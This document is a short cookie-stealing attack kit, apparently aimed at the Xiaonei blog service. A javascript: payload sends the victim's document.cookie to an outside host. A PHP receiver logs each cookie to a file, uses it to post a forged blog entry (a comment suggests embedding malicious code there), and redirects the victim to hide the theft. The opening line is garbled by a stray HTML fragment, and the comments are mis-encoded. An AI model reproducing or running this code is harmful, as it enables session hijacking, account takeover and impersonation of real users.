javascript:window.location.href='http://www.xxx.com/test.
 href="tag.php?name=php">php?cookie='+document.cookie   

ob_start();    
$url = 'blog.xiaonei.com';   
$cookie=$_GET['cookie'];   
$cookie1=$cookie."\r\n\r\n";   
fputs(fopen('a.txt','a+'),$cookie1); //cookie寫入 a.txt   
//發(fā)一條偽造的日志，這條日志里面也可以插入惡意代碼   
$sock = fsockopen("$url", 80, $errno, $errstr, 30);   
if (!$sock) die("$errstr ($errno)\n");   
$data = "title=test by fly&body=test by 
fly&categoryId=0&blogControl=99&passwordProtedted=0&
passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";   
fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");   
fwrite($sock, "Accept: */*\r\n");   
fwrite($sock, "Referer: http://$url\r\n");   
fwrite($sock, "Accept-Language: zh-cn\r\n");   
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");   
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");   
fwrite($sock, "User-Agent: Mozilla\r\n");   
fwrite($sock, "Host: $url\r\n");   
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");   
fwrite($sock, "Connection: Keep-Alive\r\n");   
fwrite($sock, "Cache-Control: no-cache\r\n");   
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");   
fwrite($sock, $data);   
$headers = "";   
while ($str = trim(fgets($sock, 4096)))   
$headers .= "$str\n";   
echo "\n";   
$body = "";   
while (!feof($sock))   
$body .= fgets($sock, 4096);   
fclose($sock);   
//echo $body;   
//跳轉(zhuǎn)到一個(gè)正常的日志   
Header("Location: http://blog.xiaonei.com/GetEntry.do?id=xxxx&owner=xxxxx");    
ob_end_flush();   
?>